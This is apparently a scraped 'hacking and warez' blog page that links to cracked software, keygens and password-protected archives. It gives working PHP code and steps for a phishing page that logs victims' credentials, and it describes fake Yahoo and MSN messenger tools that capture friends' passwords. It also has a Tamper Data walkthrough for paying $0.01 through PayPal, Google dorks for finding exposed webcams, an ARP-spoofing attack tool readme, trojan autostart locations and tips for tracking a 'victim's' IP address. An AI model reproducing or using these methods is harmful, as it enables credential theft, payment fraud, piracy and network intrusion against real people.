http://rapidshare.com/files/123606426/APSC...nload.part4.rar .
http://rapidshare.com/files/123626826/APSC...nload.part5.rar



Rar Password:

TADJ@mechodownload


100% Working Crack:
Code:

http://rapidshare.com/files/153959482/Photoshop_WDAC5III.rar


--------------------------------------------------------------------------------------

*** Nero 9 Full ***

0 comments
CODE
http://rapidshare.com/files/161894113/N9fsenergy.part1. rar



CODE
http://rapidshare.com/files/161898338/N9fsenergy.part2. rar



CODE
http://rapidshare.com/files/161902388/N9fsenergy.part3. rar



CODE
http://rapidshare.com/files/161905908/N9fsenergy.part4. rar


------------------------------------------------------------------------------------

*** Quick time player ***

0 comments
quick time player


CODE
http://rapidshare.com/files/148800974/QuickT.Pro.7.5.5.rar


-------------------------------------------------------------------------------------

*** 3gp-video-converter ***

0 comments
Ultra_Mobile_3GP_Video_Converter_3.9

CODE
http://rapidshare.com/files/165277943/Ultra_Mobile_3GP_Video_Converter_3.9. rar


video-to-flash-converter-pro
converter software

CODE
http://rapidshare.com/files/160205313/video-to-flash-converter-pro. rar

x-3gp-video-converter
converter software

CODE
http://rapidshare.com/files/160197129/x-3gp-video-converter. rar


---------------------------------------------------------------------------------------

*** Free lifetime account for Webcams.com ***

0 comments
This summary is not available. Please click here to view the post.

*** DirectX 10 ***

0 comments
DirectX 10 ...

Download
CODE
http://rapidshare.com/files/143718771/dx10_NCT_2.rar

Password:
CODE
www.rapidsharedownloads.net


------------------------------------------------------------------------------------

*** Modem Booster 5.0 ***

0 comments
Modem Booster 5.0
General Information
-------------------------------------------------------------------------------
Type.................: Application
Platform.............: Windows 9x/ME/2000/XP
Link:
Code:
CODE
http://www.inklineglobal.com/products/mb/

Install Notes:
Unpack and install
No crack required... it is FULL version!
Enjoy!! Wink
Tested and Working!!
Description:
Put your Internet Speed in 5th Gear
Get Results you can See and Feel! Laughing
Modem Booster boosts your modem speed literally from your current speed to
nearer its maximum capability. It optimizes your modem settings so that there is quick and efficient data transmission between your modem, your ISP and the Web.
It decreases the data transfer time. By optimizing your modem's settings, data
transfer time is reduced so that you can surf, email and download significantly
faster than before, even if it's peak hour on the web.
1. Boost your Internet Speed!
Slow connection hindering your enjoyment of the Internet? Enhance your internet connection and Boosts your Internet speed up to 300% with Modem Booster's proprietary PING technology!
2. Works on All Internet Connections!
Modem Booster now works on all Internet connections, even high speed internet access connections! Dial-up, DSL, ADSL, Cable modem speeds can all be improved with this Internet accelerator!
3. Max Out your Modem Speed!
Modem Booster tests your Internet speed settings systematically by running a series of diagnostic tests to see how much room there is for improvement, then determines the best settings for improved performance!
4. Tweak Hidden Internet Settings!
This accelerator download tweaks and optimizes your hidden Windows settings safely for greater Internet speeds!

Download Link:

CODE
http://rapidshare.com/files/46182795/Modem_Booster_5.0.rar


--------------------

*** Daemon Tools Pro v4.30.0303 ***

0 comments
Daemon Tools Pro v4.30.0303

Download:
http://rapidshare.com/files/176784442/DTPro.rar


------------------------------------------------------------------------------------------------------

*** Avast proffessional 2009 ***

0 comments
avast proffessional 2009

Download

CODE
http://rapidshare.com/files/174517501/Avast_AntiVirus_2009_Pro__v4.8.1282_Plus_Serial___life_time.rar



CODE
support@legendarydevils.com


----------------------------------------------------------------------------------------------

Picasa 3.1

0 comments
Find, organise and share your photos. Picasa is software that makes it easy and fun to view, organise, edit and share the digital photos on your PC. Picasa will not delete your pictures or put them online without your permission. Picasa automatically finds and organizes all of your pictures including: jpeg, tiff, bmp, psd, and standard camera movie files. Sending pictures with e-mail used to mean five steps just to get it right. Picasa lets you pick the size and then automatically attaches your pictures. Browse through all your pictures and view slideshows of your albums with the click of a button. Enhance, fix red-eye, and even crop without losing data or permanently changing your original picture. Take your photos further with Picasa from Google.

http://picasa.google.com/


---------------------------------------------------------------------------------------------

MP3 Cutter and Joiner v2.20 2008

0 comments
MP3 Cutter Joiner can one time cut and get out many excellent parts in many audio files. It can also joining the excellent part in a lot of audio files together too.
Steps to follow:
1. Download the file.
2. Extract the file.
3. Install the application by using mp3cutterjoiner.exe
4. Keygen is present in the Crack folder.
5. Generate the key and register your application.
6. Enjoy.
CODE
http://rapidshare.com/files/163605746/mp3_cypruswarez.com.rar

Pass: www.cypruswarez.com
OR
CODE
http://rapidshare.com/files/166057498/mp3_ww.rar

Pass: warezscene.org


---------------------------------------------------------------------------------------

*** LimeWire Pro ***

0 comments
CODE
http://rapidshare.com/files/144741837/LimeWire_PRO_4.18.6_.rar


-------------------------------------------------------------------------------------

*** CorelDraw 11--Portable ***

0 comments
CorelDRAW Graphics Suite 11 gives you a comprehensive graphics platform for all of your creative needs. Based on extensive customer feedback and research, CorelDRAW Graphics Suite 11 has been specifically designed to make your work more enjoyable. Graphic design can be a complex task and CorelDRAW Graphics Suite 11 aims to change that by giving you powerful tools to streamline the process of creating, editing, and reusing graphics.


CODE
http://rapidshare.com/files/97939738/CorelDraw_11_portable_abu137_.rar

OR

CODE
http://rapidshare.com/files/164920291/elbaononward-I-Scorpius.com.rar


-------------------------------------------------------------------------------------

*ENTER ANY PORN WEBSITE VIP SECTION WITHOUT PASWD*

1 comments
This summary is not available. Please click here to view the post.

Saturday, January 10, 2009

*** Fake yahoo msngr {phishing} ***

0 comments
after success of yahoo fakes here it comes fake yahoo msgr --->>


Step 1 - Install Microsoft .NET Framework.

Step 2 - Unzip and extract file.

Step 3 - Run Ypager.exe. Tell your friend to login.

Step 4 - Open C:/yahoo.txt to get the saved password.

code :
CODE
http://rapidshare.com/files/36069471/YPager.exe.html


----------------------------------------------------------------------
I TAKE NO RESPONSIBILITY WHAT U DO WITH MY TUTIONS
***********************************************************************

*** MSN hack 2.3 ***

0 comments
1) Call a Friend to Come to your House and ask him to go on MSN
2) Ask the person to log on MSN
3)Wait 3min-4min
4) Restart your PC
5)and you will get a password in the C:/ Directory
The password is in a .txt file


http://www.megaupload.com/?d=QF0TMRV7


-------------------------------------------------------------------------
TAKE NO RESPONSIBILITY WHAT U DO WITH MY TUTIONS
*********************************************************************************

*** Telnet Operation ***

0 comments
CODE
http://www.freewebtown.com/wickedsoft/Telnet-Operations.zip


------------------------------------------------------------------


I TAKE NO RESPONSIBILITY WHAT U DO WITH MY TUTIONS
***********************************************************************************8

*** Hack into webcams, Hack into webcams ***

0 comments
You should a have high speed connection for this...

Hack into webcams...This is not a hacking Guide..

It's rather a tutorial to show you how to do a simple search for unprotected webcams on the net.

This is only for fun purposes...

You are totally responsible for your actions...

(note: these are not personal webcams, this is only a guide on how to view public webcams such as traffic cams)


START

Go to this link :

CODE
www.google.com


and put this into the search Bar

Code
CODE
inurl:/view/index.shtml



OR


Code
CODE
intitle:liveapplet inurl:LvAppl



and click on google search...

it would show you a list of searched items.
Go to any of the links...Some of them don't work.

You will be able to see street/Traffic cams...

and not only this..you can also control them move them right or left or zoom in or out...

It's kind of fun

Have fun.

NOTE : You should a have high speed connection for this...


----------------------------------------------------------------------------


Thanks to a little add-on for Mozilla FireFox, you will be able to buy things online with PayPal for $0.01 instead of the normal price. Now this works by literally changing the price: you're going to tell the PayPal payment system to make you pay $0.01 instead of the normal price of the product you're buying. This works really well when it's a computer that automatically sends you the product when they see that you've paid, but it works less well when it's an actual person that sends the order. However, they might think it's an error and send it anyway

So here are the instructions that will help you getting your stuff online for practically free:

Step 1

Download https://addons.mozilla.org/en-US/firefox/addon/966 and then restart FireFox so that the add-on is fully installed

Step 2

Go shopping on the website you want, then checkout.

Step 3

When you see the final page, before clicking on the PayPal Checkout logo, on FireFox, go under Tools in the Menu and then click Tamper Data. When the new window with title Tamper Data - Ongoing Requests has opened, click Start Tamper. You may now click on the PayPal Checkout logo.

Step 4

Once you have clicked that button, a small new screen will come up with three new buttons: the one you want to click is the one called Tamper. A new window will pop up called Tamper Popup.

Step 5

This is where the fun starts: on the right side of the Tamper Popup window, you should see Loads of white boxes, most of them with text in them. To the left of these boxes, there are names like "currency code" or "item number" for example. If there aren't more than 5 boxes, close the window and wait till a new window pops up like on Step 4. If however, there are more than 5 boxes, find the one called amount and change whatever is inside to 0.01

Step 6

Then, check that boxes called shipping and tax are set to 0.00

Step 7

Afterwards, you can click OK.
The Tamper Popup should close.
Once it's closed, a few new small windows with the three buttons will open: just click Submit on all of them.

Step 8
When the PayPal page appears, on the Tamper Data - Ongoing Requests
window click Stop Tamper.

Step 9

On the PayPal page, enter your login details and click Log in.
Then, follow the steps as usual, making sure that all the prices stated are set to $0.01 or £0.01.

Step 10

Done!



--------------------
I TAKE NO RESPONSIBILITY WHAT U DO WITH MY TUTIONS
*********************************************************************************

***** Ip hidden *****

0 comments
i have found one software which hide your IP address every time and give you a new IP address by creating a Tor Network…….

If u have Mozilla then it works very fine

First Download Vidalia Bundle from here



CODE
CODE
http://www.torproject.org/download.html.en



Here is link for Windows and MAC OS ……….So download it according to your requirement .

After that to easily turn on and turn off “TOR” .. You can install Firefox add on from here :



CODE
CODE
https://addons.mozilla.org/en-US/firefox/addon/2275]/code]


then restart firefox….After that you will see at right bottom corner that your tor addon for mozilla is installed…now when u want to hide your IP or want to surfing anonymously Turn on or turn off by clicking on this.

You can check your ip address here


CODE
[code]http://www.whatismyip.com/



-------------------------------------------------------------------

*** LAN Attacker ***

0 comments
---------------------------------------------------------------------------

1. Overview

------------------------------------

WinArpAttacker is a program that can scan,attack,detect and protect computers on local area network.

The features as following:

1.1 Scan

-. It can scan and show the active hosts on the LAN within a very short time (~2-3 seconds).

It has two scan mode, one is normal scanning, the other is antisniff scanning. The later is to find who is sniffing on the lan.

-. It can save and load computer list file.

-. It can scan the Lan regularly for new computer list.

-. It can update the computer list in passive mode using sniffing technology, that is, it can update the computer list from the sender's address of arp request packets without scanning the lan.

-. It can perform advanced scanning when you open advanced scanning dialg on menu.

-. It can scan a B class ip range in advanced scan dialg.

-. It can scan acthost listed in event listview.

1.2 Attack

-. It can pull and collect all the packets on the LAN.

-. It can perform six attacking actions as following:

(1) Arp Flood - Send ip conflict packets to target computers as fast as possible, if you send too much, the target computers will down. :-(

(2) BanGateway - Tell the gateway a wrong mac address of target computers, so the targets can't receive packet from the internet. This attack is to forbid the targets access the internet.

(3) IPConflict - Like Arp Flood, send ip conflict packets to target computers regularly, maybe the users can't work because of regular ip conflict message. what's more, the targets can't access the lan.

(4) SniffGateway - Spoof the targets and the gateway, you can use sniffer to collect packets between them.

(5) SniffHosts - Spoof among two or above targets, you can use sniffer to collect packets among all of them. (dangerous!!!!)

(6) SniffLan - Just like SniffGateway, the difference is that SniffLan sends broadcast arp packets to tell all computers on the lan that this host is just the gateway, So you can sniff all the data between all hosts with the gateway.(dangerous!!!!!!!!!!!!!!)

-. While spoofing ARP tables, it can act as another gateway (or ip-forwarder) without other users' recognition on the LAN.

-. It can collect and forward packets through WinArpAttacker's ipforward function, you had best check disable system ipforward function because WinArpAttacker can do well.

-. All data sniffed by spoofing and forwarded by WinArpAttacker ipforward function will be counted, as you can see on main interface.

-. As your wish, the arp table is recovered automatically in a little time (about 5 seconds). Your also can select not to recover.

1.3 Detect

-. What is the most important function, it can detect almost all attacking actions metioned as above as well as host status. the event WinArpAttacker can detect is listed as following:

SrcMac_Mismath - Host sent an arp packet, its src_mac doesn't match,so the packet will be ignored.

DstMac_Mismath - Host recv an arp packet, its dst_mac doesn't match,so the packet will be ignored.

Arp_Scan - Host is scanning the lan by arp request for a hosts list.

Arp_Antisniff_Scan - Host is scanning the lan for sniffing host,thus the scanner can know who is sniffing.

Host_Online - Host is online now.

Host_Modify_IP - Host modified its ip to or added a new IP.

Host_Modify_MAC - Host modified its mac address.

New_Host - New gost was found.

Host_Add_IP - Host added a new ip address.

Multi_IP_Host - Host has multi-ip addresses.

Multi_Mac_Host - Host has multi-mac addresses.

Attack_Flood - Host sends a lot of arp packets to another host ,so the target computer maybe slow down.

Attack_Spoof - Host sends special arp packets to sniff the data two targets , so the victims' data exposed.

Attack_Spoof_Lan - Host lets all host on the lan believe that it's just a gateway, so the intruder can sniff all hosts' data to the real gateway.

Attack_Spoof_Ban_Access - Host told host that host has a inexist mac,so the targets can't communicate with each other.

Attack_Spoof_Ban_Access_GW - Host told host that the gateway has a inexist mac, so the target can't access the internet through the gateway.

Attack_Spoof_Ban_Access_Lan - Host broadcast host's mac as a inexist mac, so the target can't communicate with all hosts on the lan.

Attack_IP_Conflict - Host found another host has same ip as its, so the target would be disturbed by ip conflict messages.

Local_Arp_Entry_Change - now WinArpAttacker can watch local arp entry, when a host's mac address in local arp table is changed, WinArpAttacker can report.

Local_Arp_Entry_Add - When a mac address of a host is added to local arp table, WinArpAttacker can report.

-. It can explain each event which WinArpAttacker detected.

-. It can save events to file.

1.4 Protect

-. Support arp table protect. when WinArpAttacker detects local or remote host's is being arp-spoofing, it will recover local or remote host's arp tables as you wish.

1.5 Proxy Arp

-. When hosts on your lan request other hosts' mac address, WinArpAttacker will tell it a certain mac address as you wish.

-. It aims to realize accessing the internet without changing your ip on a new lan, but it also can make your lan in a big mass if you assign a wrong mac address.

1.6 Save arp packets

-. It can save all sniffed arp packets to file.

1.7 other features.

-. Support multi-network adapter and multi-ip address and multi-gateway on a computer, you can select different adapter and ip address to scan different lan.

-. Support DHCP and fixed ip address.

-. Count all the arp packets for each host, including sent and recieved arp packets.

Arp R/S Q/P

| |

Action(Recive/Send) Arp packets type(ReQuest/RePly)

- - - -

ArpRQ meaning: The number of arp request packets recieved

ArpRP meaning: The number of arp reply packets recieved

ArpSQ meaning: The number or arp request packets sent

ArpSP meaning: The number or arp reply packets sent

2. System Requirement.

------------------------------------

-. Local : Windows XP/2000/2003(But I hadn't tested it under Windows XP/2003)

-. Remote : All computers including network devices

-. WinPcap driver 3.1/lastest must be needed.

3. What's New

------------------------------------

+ It can scan a large ip range for online hosts by advanced scanning mode.

+ It can protect local and reomte hosts from arp-spoofing.

+ It can enable proxy arp, act as a arp proxy.

+ It can save all sniffed arp packets to file.

4. Getting Started

------------------------------------

-. Firtly, install the latest WinPcap driver.

-. second, just run WinArpAttacker.exe

-. click scan button and start button

-. look at arp information on remote computer with "arp -a"

-. to stop attack, click stop button.

-. to select adapter or ip address, click options button.

-. to modify attacking setup, click options button.

5. Known Issues

1) This program should be run with administrator privilege.

If not, the program will work abnormally.

2) The attacking action is dangerous, so you must be caution.

3) If there are many active hosts (more than 50) and the real gateway may be down on LAN.

6. Revision History

------------------------------------

= bug fixed

+ improvement/modification

[Start of Versions History]

Version 3.50 ( Jun. 4,2006)

+ It can detect local arp table's change.

+ It can protect local and reomte hosts from arp-spoofing.

+ It can enable proxy arp, act as a arp proxy.

+ It can save all sniffed arp packets to file.

+ It allows you send arp packets manunally.

Version 3.02 ( Apr. 26,2006)

+ It can scan a large ip range for online hosts by advanced scanning mode.

Version 3.00 ( Oct. 07, 2005)

--------------------------------

+ It can detect attacking actions.

+ Add serval scanning mode.

+ It can update the host list from ip packets.

Version 1.50 ( May. 16, 2005)

--------------------------------

+ It can scan the Lan regularly for new computer list.

+ It can update the computer list in passive mode using sniffing technology, that is, it can update the computer list from the sender's address of arp request packets without scanning the lan.

+ Add two options: auto scan and update in passive mode.

+ It can diplay localhost's ip address , mac address, gateway ip address and current computer list status on status bar.

+ Add taskbar icon support, if you close the WinArpAttacker's window, it will leave a icon on taskbar, not really close, thus it can update computer list on the background.

Version 1.10 ( April. 27, 2005)

--------------------------------

+ Support DHCP and fixed ip address.

= When flood attack started, to click stop can't really stop flood attacking.

= IP address is incorrectly sorted when 10.1.0.1 and 192.168.1.1 coexists.

= When PacketSendPacket failed, to exit program will encounter an invalid operator.

Version 1.00 ( April. 16, 2005)

--------------------------------

This program is released.


Caution: This program is dangerous, it is released just for research, any possible loss caused by this program is no relation with the author (unshadow), if you don't permit this, you must delete it immediately.

If you use this program, I think you permit all of these.

-----------------------------------------------------------------------------

WinArpAttacker is based on wpcap, you must install wpcap driver before running it.

wpcap: http://winpcap.polito.it/install/bin/WinPcap_3_1.exe

If you had installed old version of winpcap, just install WinPcap_3_1.exe overwrite it.

-----------------------------------------------------------------------------

Contents

1. Overview

2. System Requirement

3. What's New

4. Getting Started

5. Known Issues

6. Revision History

7. To do



20nsy58omb6hjpuxmf3.png

CODE
http://rapidshare.com/files/113819720/LanAttacker.exe


--------------------------------------------------------------------------------

*** Hacking Tool Collection 2008 ***

0 comments
denial of service
http://rapidshare.com/files/128519193/deni...ervice.zip.html

cryptography
http://rapidshare.com/files/128519721/cryptography.zip.html

enumeration
http://rapidshare.com/files/128520430/enumeration.zip.html

evading ids and firewalls
http://rapidshare.com/files/128523792/evad...eypots.zip.html

footprinting
http://rapidshare.com/files/128524083/footprinting.zip.html

hacking wireless
http://rapidshare.com/files/128524582/hack...tworks.zip.html

egality
http://rapidshare.com/files/128524730/legality.zip.html

linux hacking
http://rapidshare.com/files/128525176/linux_hacking.zip.html

penetration testing
http://rapidshare.com/files/128525326/pene...logies.zip.html

physical security
http://rapidshare.com/files/128525683/phys...curity.zip.html

scanning
http://rapidshare.com/files/128527629/scan....part1.rar.html
http://rapidshare.com/files/128529133/scan....part2.rar.html

session hijacking
http://rapidshare.com/files/128529738/sess...acking.zip.html

sniffer
http://rapidshare.com/files/128530931/sniffers.zip.html

social engineering
http://rapidshare.com/files/128531755/soci...eering.zip.html

sql injection
http://rapidshare.com/files/128531986/sql_injection.zip.html

system hacking
http://rapidshare.com/files/128533307/syst...acking.zip.html


------------------------------------------------------------

*** Hacking Tools ***

0 comments
The Tools given here are the "Official Hacking Tools", recommended by most of the hackers' communities worldwide....!
Detail Information on each tool, Download Links and More....!

Check out the link below-
http://www.insecure.in/hacktools.asp


---------------------------------------------------------------------------------------------

*** How to get someone's IP ***

0 comments
* Obtaining an IP Address.
* ========================

Well, many people have sent me E-Mails asking how you get an IP
address, so here are three very quick and easy methods that have been
written about hundreds of times by now.


Obtaiing an IP from MSN Messenger.
----------------------------------

Firstly we learn the method used by most people when they want to get
someone elses IP Address.

Step 1 - Start MSN Messenger and login as yourself.

Step 2 - Hit your "Start" button and click run. Type into the white box
"Command" (without the quotation marks)

Step 3 - Type in "Netstat -N" (without the quotation marks) into the
black box and hit enter.

Step 4 - Start a conversation with your 'victim' and send them a file.
Once they accept the file Hit your "Start" button and click run. Type
into the white box "Command" (without the quotation marks) and Type in "Netstat -N" (without the quotation marks) into the black box and hit
enter.

Step 5 - Look in the middle column of both your MS Dos boxes and look
in the newer wndow for the IP address that has magically appeared in
the middle column. This is your victim's IP Address.

Obtaiing an IP from an E-Mail.
-------------------------------

Ok, lets say the person does not use MSN Messenger (can't blame them)
we can get an IP address from most E-Mail address. In this example we
shall use Outlook Express to view the E-Mails in.

Step 1 - Load Outlok express and left click on an E-Mail that was sent
from your 'victim'

Step 2 - Right click this E-Mail and click the "Properties" button.

Step 3 - Now Click on the tab displaying as it's text "Details" and
look for the buttom saying "Message Source", once found (not hard) click it.

Step 4 - Look in all the jargon for something like "X-Originating-IP: "
with a number after the colon. This number is the sender's IP Address.

Step 5 - If you cannot find "X-Originating-IP: " then do not worry.
Look for instead "Received:", and go along this string untill you come
to a nuber in brackets, this however maybe an IP but it might not be
the IP address of the 'victim', infact if they sent the E-Mail from a
we E-Mail service (like hotmail.com) then chances are it is not their
IP address.

Obtaiing an IP from Physical Access.
------------------------------------

If you have physical access to a computer then getting the IP address
is simple.

Step 1 - Click the "Start" button and hit "Run". Type in "Command" and
hit enter.

Step 2 - Type in "ipconfig" OR "winipcfg" and hit enter now look for
where it says "IP Address:", next to this is the IP of the computer you
are using.

But lets say it is a school computer, what if they have removed the run
button or removed the MS Dos prompt, well then you load the Internet
and navigate to either: http://www.whatismyip.com
* http://www.ipchicken.com
both of these websites will display the IP Address of the current
computer.

************************************************** *********************

So now you should know three methods of getting the IP address from a
computer, handy for system administrators using R.A.T's.

If you have any comments or questions or fixes on the above information
please E-Mail me on Splinter_X101@hotmail.com or fill out a contact
form from http://splintersecurity.cjb.net

Thanks for reading, I hope it was usefull!

Cheers.


------------------------------------------------------------------

***How to access the restricted or banned websites?***

0 comments
Method 1: Search the banned website, for example


www.orkut.com

in Google and yahoo search engine then open the cached copy of that page to access the website. You can get also cache link of that website, if you search in Google with keyword cache:URL name and get cache link to access the website.


Method 2: Another method to access the banned website using its IP address, because you can open the website with IP address instead of actual URL name. This technique bypasses the URL based restrictions. For example if


www.myspace.com

is banned in your school, you can open it using IP address 216.178.32.51. You can search online IP conversion tools to get IP address of any website.


Method 3: There are some mini web browsers can help you to open the banned websites, for example Opera Mini Browser, install it and try to open any banned website. Another Real Player browser can successfully help you to access the banned website. This Real Player browser bypasses the many restrictions of website banned tools.


Method 4: There any many websites Anonymizer tools are available to fetch the banned website. These anonymous surfing tools that protect your identity on the internet and give the access to banned sites. As far as the service provider is concerned you are viewing a page from Anonymizer and not the blocked site.



These tips are very useful to access the banned websites in your university, cybercafe ,office and other public places


---------------------------------------------------------------------

***Places that viruses and trojans hide on start up***

0 comments
Credit - ShaolinTiger -

1. START-UP FOLDER. Windows opens every item in the Start Menu's Start Up folder. This folder is prominent in the Programs folder of the Start Menu.

Notice that I did not say that Windows "runs" every program that is represented in the Start Up folder. I said it "opens every item." There's an important difference.

Programs represented in the Start Up folder will run, of course. But you can have shortcuts in the Start Up folder that represent documents, not programs.

For example, if you put a Microsoft Word document in the Start Up folder, Word will run and automatically open that document at bootup; if you put a WAV file there, your audio software will play the music at bootup, and if you put a Web-page Favourites there, Internet Explorer (or your own choice of a browser) will run and open that Web page for you when the computer starts up. (The examples cited here could just as easily be shortcuts to a WAV file or a Word document, and so on.)

2. REGISTRY. Windows executes all instructions in the "Run" section of the Windows Registry. Items in the "Run" section (and in other parts of the Registry listed below) can be programs or files that programs open (documents), as explained in No. 1 above.

3. REGISTRY. Windows executes all instructions in the "RunServices" section of the Registry.

4. REGISTRY. Windows executes all instructions in the "RunOnce" part of the Registry.

5. REGISTRY. Windows executes instructions in the "RunServicesOnce" section of the Registry. (Windows uses the two "RunOnce" sections to run programs a single time only, usually on the next bootup after a program installation.)

7. REGISTRY. Windows executes instructions in the HKEY_CLASSES_ROOT\exefile\shell\open\command "%1" %* section of the Registry. Any command imbedded here will open when any exe file is executed.

Other possibles:

CODE
[HKEY_CLASSES_ROOT\exefile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\comfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\batfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\piffile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] ="\"%1\"
%*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] ="\"%1\"
%*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] ="\"%1\"
%*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] ="\"%1\"
%*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] ="\"%1\"
%*"

If keys don't have the "\"%1\" %*" value as shown, and are changed to something like "\"somefilename.exe %1\" %*" than they are automatically invoking the specified file.

8. BATCH FILE. Windows executes all instructions in the Winstart batch file, located in the Windows folder. (This file is unknown to nearly all Windows users and most Windows experts, and might not exist on your system. You can easily create it, however. Note that some versions of Windows call the Windows folder the "WinNT" folder.) The full filename is WINSTART.BAT.

9. INITIALIZATION FILE. Windows executes instructions in the "RUN=" line in the WIN.INI file, located in the Windows (or WinNT) folder.

10. INITIALIZATION FILE. Windows executes instructions in the "LOAD=" line in the WIN.INI file, located in the Windows (or WinNT) folder.

It also runs things in shell= in System.ini or c:\windows\system.ini:

[boot]
shell=explorer.exe C:\windows\filename

The file name following explorer.exe will start whenever Windows starts.

As with Win.ini, file names might be preceeded by considerable space on such a line, to reduce the chance that they will be seen. Normally, the full path of the file will be included in this entry. If not, check the \Windows directory


11. RELAUNCHING. Windows reruns programs that were running when Windows shut down. Windows cannot do this with most non-Microsoft programs, but it will do it easily with Internet Explorer and with Windows Explorer, the file-and-folder manager built into Windows. If you have Internet Explorer open when you shut Windows down, Windows will reopen IE with the same page open when you boot up again. (If this does not happen on your Windows PC, someone has turned that feature off. Use Tweak UI, the free Microsoft Windows user interface manager, to reactivate "Remember Explorer settings," or whatever it is called in your version of Windows.)

12. TASK SCHEDULER. Windows executes autorun instructions in the Windows Task Scheduler (or any other scheduler that supplements or replaces the Task Scheduler). The Task Scheduler is an official part of all Windows versions except the first version of Windows 95, but is included in Windows 95 if the Microsoft Plus Pack was installed.

13. SECONDARY INSTRUCTIONS. Programs that Windows launches at startup are free to launch separate programs on their own. Technically, these are not programs that Windows launches, but they are often indistinguishable from ordinary auto-running programs if they are launched right after their "parent" programs run.

14. C:\EXPLORER.EXE METHOD.

C:\Explorer.exe

Windows loads explorer.exe (typically located in the Windows directory)during the boot process. However, if c:\explorer.exe exists, it will be executed instead of the Windows explorer.exe. If c:\explorer.exe is corrupt, the user will effectively be locked out of their system after they reboot.

If c:\explorer.exe is a trojan, it will be executed. Unlike all other autostart methods, there is no need for any file or registry changes - the file just simply has to be named c:\explorer.exe

15. ADDITIONAL METHODS.

Additional autostart methods. The first two are used by Trojan SubSeven 2.2.

HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\explorer\Usershell folders

Icq Inet
CODE
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\test]
"Path"="test.exe"
"Startup"="c:\\test"
"Parameters"=""
"Enable"="Yes"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\]
This key specifies that all applications will be executed if ICQNET Detects an Internet Connection.

[HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap] ="Scrap object"
"NeverShowExt"=""

This key changes your file's specified extension.


--------------------

*** How to make a phisher ***

0 comments
Firstly, you need a host with php, like 100mb or freehostia or whatever.

Now, copypaste this and save it as phish.php.


CODE
header("Location: www.site.com");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit; ?>



Edit "www.site.com" to the site you're phishing, coz it redirects to that URL after the person submits the login.

Now, save the login page of whatever site you want to clone.

In the source (open with notepad), find where it says "form action=" and replace the URL with "phish.php", and where it says "method=post", change "post" to "get".

Now, save it, and upload all contents to the site you just made. Make sure all CSS/images/links and stuff work, because your mission is to get a replica page.

Now that should be about all, ask here for any questions.


-------------------------------------------------------------

*** simple trick to make video avtars ***

0 comments
well..this is very simple ..bt still quite intrstin tongue.!


Video Avatars


1. Open PowerDVD:
user posted image

2. Open a movie or Video clip:
user posted image
user posted image

3. Go to the beginning of the part u want as avatar & click on pause
user posted image

4. make a picture of it:
user posted image

5. press 2 steps forward & then make another pic, do this until u got the whole part:
user posted image

6. go to imageready 7 & then select "file", "import" & then "folder as frames..." & then u select the folder wit your pics made wit powerDVD:

7. put the layers in place & save it optimized as GIF
-----------------------------------------------------------------------------

voilla


----------------------------------------------------------------------------------

*** Secure Telnet Chat ***

0 comments
Ever want to have a secure chat with friends? Possibly something to hide? When realizing that you're conversations on AIM MSN etc. are in no way private, these companies say that you're conversations can be stored on mainframes, and in some cases be evidence to crime. This is perhaps why you might want to set up a telnet chat. These are unique, because you're the host, and you can invite you're friends to join you're chat, realizing that you must be careful as they will connect to you're IP. Anyway, here's how one would set up a telnet chat:


1. 20nsy58omb6hjpuxmf3.png STChat here: http://sourceforge.net/projects/stchat/

2. Extract the folder to C:/
(so the folder will be stc-0_16)

3. Open up notepad, and paste the following:

@echo off
CD C:/stc-0_16
java stc 22

4. Save it as a .bat file where ever you want. For example, I saved mine as initiate.bat as in initiating hosting the chat.

5. Run the .bat file. Now, you can 'telnet xx.xx.xx.xxx 22' where xx.xx.xx.xxx is you're IP. If you don't know what you're IP is, open up the command prompt (windows XP start>run>cmd. Type ipconfig.

And you're done, you are currently hosting you're chat. This should be a secure chat for you and you're friends to discuss whatever. It's kind of neat too.


----------------------------------------------------------------------

*** How to Use John the Ripper ***

0 comments
Alright, here is a step-by-step walk-through/tutorial on how to use John the Ripper, one of the most frequently used password crackers. It’s very easy if you know what you’re doing. First off you need to 20nsy58omb6hjpuxmf3.png John the Ripper (JTR), which you can do from: http://www.openwall.com/john/.

If you’re running on Windows, just 20nsy58omb6hjpuxmf3.png the win32 binaries. Once you have downloaded JTR to your desktop, unzip the files (it will automatically be saved in the folder john-16). Now proceed to moving this folder straight to the C:\ drive. Open it and you should see 2 directories: run and doc. All you need to be concerned about is the run directory. Now I suppose that you have a password hash and want to figure out what the password is (a hash is just your encrypted password, which is encrypted using algorithms such a message digest, most commonly referred as MD(2,4, and 5), DES (data encryption standard) and sha). Your password is encrypted for security reasons, so that if, for example, the database gets hacked, someone can’t just read your passwords and login as you.

This makes the hacker have to use a program to match a password to your hash, which can take a very long time if you use a secure password.

Open up notepad and print the following information: [username]:[hash] like that. The username should be exchanged w/ whosever username the hash is, this is often administrator, and of course then put the hash afterwards, separated by a “:” no spaces.

Save this file as a text file, for example “hash.txt”, in the run dir of john-16.

Now ‘re ready to use JTR to crack that hash!

Open up command prompt (start > run > cmd), it will most likely start out in the dir documents and settings/, just type the command ‘.cd \’ to go to C:\. Now type “cd john-16\run\” w/o the ” “, and then just simply type: john (john is the .exe file). This will open up JTR and you should see a screen full of all the commands that you use in JTR. Now simply type this: “john.exe [name of the text file we saved earlier]” without the ” ” (we used the example hash.txt earlier), and it should say loaded 2 passwords and then start cracking.

